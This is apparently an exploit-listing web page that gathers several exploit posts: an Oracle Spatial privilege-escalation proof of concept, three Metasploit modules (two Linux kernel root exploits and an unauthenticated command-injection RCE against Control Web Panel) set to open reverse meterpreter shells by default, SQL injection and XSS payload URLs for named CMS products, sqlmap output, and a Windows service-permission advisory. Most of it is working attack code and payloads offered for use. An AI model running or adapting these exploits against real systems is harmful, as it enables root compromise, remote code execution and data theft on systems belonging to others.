Latest exploits :: CodePwn

<pre><code>Title: Oracle Database Privilege Escalation Through Oracle Spatial Component Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2 Tested Version(s): 12cR1 Risk Level: High Solution Status: Fixed in Oracle Critical Patch Update October 2021 CVE Reference: N/A, Backported in Oracle CPU OCT 2021 Author of Advisory: Emad Al-Mousa Overview: Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc. ***************************************** Vulnerability Details: The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021. To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system: SQL> select comp_name from dba_registry; ***************************************** Proof of Concept (PoC): // I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions: sqlplus / as sysdba SQL> create user ironman identified by iron_123; SQL> grant create session to ironman; SQL> grant create any procedure to ironman; SQL> grant execute any procedure to ironman; SQL> exit; // I will now connect using the newly created account “ironman” using sql plus sqlplus ironman/iron_123 SQL> show user USER is “IRONMAN” SQL> select * from session_roles; no rows selected SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as BEGIN EXECUTE IMMEDIATE (SQL_TEXT); END hulk; / SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman'); SQL> select * from session_roles; no rows selected SQL> set role DATAPUMP_IMP_FULL_DATABASE; // ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE SQL> select * from session_roles; ROLE ——————————————————————————– DATAPUMP_IMP_FULL_DATABASE EXP_FULL_DATABASE SELECT_CATALOG_ROLE HS_ADMIN_SELECT_ROLE HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE EXECUTE_CATALOG_ROLE IMP_FULL_DATABASE 8 rows selected. // the next escalation level is to DBA role !! SQL> grant dba to ironman; SQL> set role dba; SQL> select * from session_roles; ROLE ——————————————————————————– DBA SELECT_CATALOG_ROLE HS_ADMIN_SELECT_ROLE HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE Advertisements Report this ad IMP_FULL_DATABASE DATAPUMP_EXP_FULL_DATABASE DATAPUMP_IMP_FULL_DATABASE ROLE ——————————————————————————– GATHER_SYSTEM_STATISTICS SCHEDULER_ADMIN XDBADMIN XDB_SET_INVOKER JAVA_ADMIN JAVA_DEPLOY WM_ADMIN_ROLE CAPTURE_ADMIN OPTIMIZER_PROCESSING_RATE EM_EXPRESS_ALL EM_EXPRESS_BASIC 22 rows selected. --- Conclusion: The account ironman has been successfully elevated to the “DBA” role which is the highest database role in Oracle database system. ***************************************** - Defensive Techniques: configure auditing to catch any privilege escalation attempts. review database account permissions on regular basis. ensure database accounts have strong passwords, and rotate passwords regularly if possible. perform VA (vulnerability assesment) scans on regular basis. pro-actively patch your systems and database systems. ***************************************** References: https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/ Credit: Security-In-Depth Contributors: Emad Al-Mousa </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking # https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::Linux::Compile prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'io_uring Same Type Object Reuse Priv Esc', 'Description' => %q{ This module exploits a bug in io_uring leading to an additional put_cred() that can be exploited to hijack credentials of other processes. We spawn SUID programs to get the free'd cred object reallocated by a privileged process and abuse them to create a SUID root binary ourselves that'll pop a shell. The dangling cred pointer will, however, lead to a kernel panic as soon as the task terminates and its credentials are destroyed. We therefore detach from the controlling terminal, block all signals and rest in silence until the system shuts down and we get killed hard, just to cry in vain, seeing the kernel collapse. The bug affected kernels from v5.12-rc3 to v5.14-rc7. More than 1 CPU is required for exploitation. Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Ryota Shiga', # discovery 'Mathias Krause' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ], [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ], [ 'URl', 'https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14' ], [ 'CVE', '2022-1043' ] ], 'DisclosureDate' => '2022-03-22', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def check # Check the kernel version to see if its in a vulnerable range release = kernel_release if Rex::Version.new(release.split('-').first) > Rex::Version.new('5.14-rc7') || Rex::Version.new(release.split('-').first) < Rex::Version.new('5.12-rc3') vprint_error "Kernel version #{release} is not vulnerable" return CheckCode::Safe end vprint_good "Kernel version #{release} appears to be vulnerable" # make sure we have enough CPUs. Minimum 2 required cpu = get_cpu_info if cpu[:cores] < 2 CheckCode::Safe("> 1 CPU required, detected: #{cpu[:cores]}") end CheckCode::Vulnerable("> 1 CPU required, detected: #{cpu[:cores]}") end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable, writing to a random name so AV doesn't have too easy a job executable_name = ".#{rand_text_alphanumeric(5..10)}" executable_path = "#{base_dir}/#{executable_name}" payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" if live_compile? vprint_status 'Live compiling exploit on system...' code = strip_comments(exploit_source('CVE-2022-1043', 'cve-2022-1043.c')) upload_and_compile executable_path, code else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('CVE-2022-1043', 'pre_compiled') end # Upload payload executable upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) register_files_for_cleanup(executable_path) timeout = 30 print_status 'Launching exploit...' output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout output.each_line { |line| vprint_status line.chomp } end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::Linux::Compile prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc', 'Description' => %q{ If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to recover by deallocating the (already populated) file descriptor. This is wrong, as the fd gets released via put_unused_fd() which shouldn't be used, as the fd table slot was already populated via the previous call to fd_install(). This leaves userland with a valid fd table entry pointing to a free'd 'file' object. We use this bug to overwrite a SUID binary with our payload and gain root. Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable. Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Mathias Krause' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ], [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ], [ 'CVE', '2022-22942' ] ], 'DisclosureDate' => '2022-01-28', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true }, 'Notes' => { 'Stability' => [CRASH_OS_DOWN], 'Reliability' => [REPEATABLE_SESSION], # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]) ] end def base_dir datastore['WritableDir'].to_s end def check # Check the kernel version to see if its in a vulnerable range release = kernel_release unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') && Rex::Version.new(release) < Rex::Version.new('5.17-rc1') return CheckCode::Safe("Kernel version #{release} is not vulnerable") end vprint_good "Kernel version #{release} appears to be vulnerable" @driver = nil if writable?('/dev/dri/card0') # ubuntu, RHEL @driver = '/dev/dri/card0' elsif writable?('/dev/dri/renderD128') # debian @driver = '/dev/dri/renderD128' else return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128') end vprint_good("#{@driver} found writable") @suid_target = nil if setuid?('/bin/chfn') # ubuntu @suid_target = '/bin/chfn' elsif writable?('/bin/chage') # RHEL/Centos @suid_target = '/bin/chage' else return CheckCode::Safe('/bin/chfn isn\'t SUID or /bin/chage not writable') end vprint_good("#{@suid_target} suid binary found") if kernel_modules&.include?('vmwgfx') return CheckCode::Appears('vmwgfx installed') end CheckCode::Safe('Vulnerable driver (vmwgfx) not found') end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # backup the suid binary before we overwrite it @suid_backup = read_file(@suid_target) path = store_loot( @suid_target, 'application/octet-stream', rhost, @suid_backup, @suid_target ) print_good("Original #{@suid_target} backed up to #{path}") executable_name = ".#{rand_text_alphanumeric(5..10)}" executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" c_code = exploit_source('CVE-2022-22942', 'cve-2022-22942-dc.c') c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload upload_and_compile executable_path, strip_comments(c_code) register_files_for_cleanup(executable_path) else unless @suid_target == '/bin/chfn' fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems') end vprint_status 'Dropping pre-compiled exploit on system...' payload_path = '/tmp/.aYd3GAMlK' upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled') end # Upload payload executable print_status("Uploading payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(generate_payload_exe) print_status 'Launching exploit...' output = cmd_exec executable_path, nil, 30 output.each_line { |line| vprint_status line.chomp } end def cleanup if @suid_backup.nil? print_bad("MANUAL replacement of trojaned #{@suid_target} is required.") else print_status("Replacing trojaned #{@suid_target} with original") write_file(@suid_target, @suid_backup) end super end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : mybizcms.com │ │ Vendor : MyBizCMS │ │ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /categories/phones /categories/phones?min_price=2485[SQLI]&max_price=145000[SQLI]&brand[]=16&review_ratings=5&a4tech-brand[]=50[SQLI]&battery[]=44[SQLI]&storage[]=41[SQLI]&display[]=37[SQLI]&performance[]=36[SQLI]&attribute3[]=7[SQLI] GET parameter 'min_price' is vulnerable to SQLI GET parameter 'max_price' is vulnerable to SQLI GET parameter 'a4tech-brand[]' is vulnerable to SQLI GET parameter 'battery[]' is vulnerable to SQLI GET parameter 'display[]' is vulnerable to SQLI GET parameter 'performance[]' is vulnerable to SQLI GET parameter 'attribute3[]' is vulnerable to SQLI [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : mybizcms.com │ │ Vendor : MyBizCMS │ │ Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /search GET parameter 'pg' is vulnerable to XSS /search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsg Path: /categories/phones GET parameter 'max_price' is vulnerable to XSS /categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwm Path: /categories/phones GET parameter 'min_price' is vulnerable to XSS /categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag [-] Done </code></pre>

<pre><code># Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated) # Date: 2023-01-02 # Exploit Author: Muhammad Navaid Zafar Ansari # Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip # Version: 1.0 # Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian) # CVE: Not Assigned Yet # References: - ------------------------------------------------------------------------------------ 1. Description: ---------------------- Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql SQLMap Response: [*] starting @ 04:49:58 /2023-02-01/ [04:49:58] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK --- [04:50:00] [INFO] testing MySQL [04:50:00] [INFO] confirming MySQL [04:50:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.55, PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) 3. Example payload: ---------------------- (boolean-based) ' AND 1=1 AND 'test'='test 4. Burpsuite request: ---------------------- GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip Connection: close </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/stopwatch' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'CWP login.php Unauthenticated RCE', 'Description' => %q{ Control Web Panel versions < 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running. }, 'Author' => [ 'Spencer McIntyre', # metasploit module 'Numan Türle' # vulnerability discovery ], 'References' => [ [ 'CVE', '2022-44877' ], [ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ], [ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ] ], 'DisclosureDate' => '2023-01-05', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(2031), OptString.new('TARGETURI', [true, 'Base path', '/login/index.php']) ]) end def check sleep_time = rand(5..10) _, elapsed_time = Rex::Stopwatch.elapsed_time do execute_command("sleep #{sleep_time}") end vprint_status("Elapsed time: #{elapsed_time} seconds") unless elapsed_time > sleep_time return CheckCode::Safe('Failed to test command injection.') end CheckCode::Appears('Successfully tested command injection.') rescue Msf::Exploit::Failed return CheckCode::Safe('Failed to test command injection.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd if execute_command(payload.encoded) print_good("Successfully executed command: #{payload.encoded}") end when :linux_dropper execute_cmdstager end end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)", 'vars_post' => { 'username' => 'root', # *must* be root 'password' => rand_text_alphanumeric(4..16), 'commit' => 'Login' } ) # the command will either cause the response to timeout or return a 302 return if res.nil? return if res.code == 302 && res.headers['Location'].include?('login=failed') fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}") end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : PHPJabbers.com │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Business Directory Script 3.2 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php/ URL parameter vulnerable to XSS /preview.php/[XSS]?controller=pjListings&action=pjActionAccount GET parameter 'keyword' vulnerable to XSS /preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&keyword=[XSS] [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : PHPJabbers.com │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Auto Classifieds Script 3.2 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php/ URL parameter vulnerable to XSS /preview.php/[XSS]?controller=pjListings&action=pjActionSearch [-] Done </code></pre>

<pre><code>mRemoteNG mRemoteNG v1.76.20 Privilege Escalation Detailed Information ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Product Name: mRemoteNG Vendor Home Page: https://mremoteng.org Vulnerable Version: mRemoteNG v1.76.20 Fixed Version: mRemoteNG v1.76.20.24615 Vulnerability Type: Improper Access Control (CWE-284) CVE Reference: CVE-2020-24307 Author of Advisory: Thurein Soe ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Product Description: mRemoteNG is an open-source multi-protocol, remote connections manager for Windows that allows managing multiple diverse connections with remote systems. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Vulnerability description: Windows service permissions is a type of local privilege escalation in the windows operating system. Weak service permissions run with system user permission that allows a standard user to elevate to administrator privilege on the compromised system upon successfully modifying the service. mRemoteNG.exe was giving modify permission to any authenticated users in the windows operating system that allows standard users to modify the service resulting in leading Privilege Escalation. C:\Users\NyaMeeEain>icacls "C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe" C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(M) BUILTIN\Users:(M) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(M) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ References: https://www.immuniweb.com/vulnerability/improper-access-control.html https://www.cvedetails.com/cwe-details/284/Access-Control-Authorization-Issues.html ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Credits: Thurein Soe ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ </code></pre>